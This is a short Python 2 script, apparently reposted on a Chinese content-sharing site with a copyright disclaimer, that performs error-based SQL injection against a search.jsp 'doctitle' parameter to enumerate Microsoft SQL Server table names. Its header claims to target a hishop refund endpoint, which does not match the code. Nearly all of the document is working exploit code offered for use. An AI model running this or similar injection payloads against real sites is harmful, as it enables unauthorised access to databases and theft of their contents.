#coding:utf-8 #Author:LSA #Description:hishop sqli for /user/UserrefundApply?OrderId= #Date:20190701 import sys import requests from bs4 import BeautifulSoup import re headers = { 'Cookie': '', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36' } global tables_name tables_name = "'XWCMFLOWACTION'" #print tables_name def brute_tables(url): for i in range(0,300): url = 'http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(' + tables_name + '))%3E0--' print url rsp = requests.get(url,headers=headers) soup = BeautifulSoup(rsp.text,"lxml") title = soup.p.text print title table_name = re.findall(r"'(.*?)'",title) print table_name print table_name[0] global tables_name tables_name = tables_name + ',\'' + table_name[0] + '\'' print tables_name def main(url): brute_tables(url) if __name__ == '__main__': url = 'http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(' + tables_name + '))%3E0--' main(url)
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
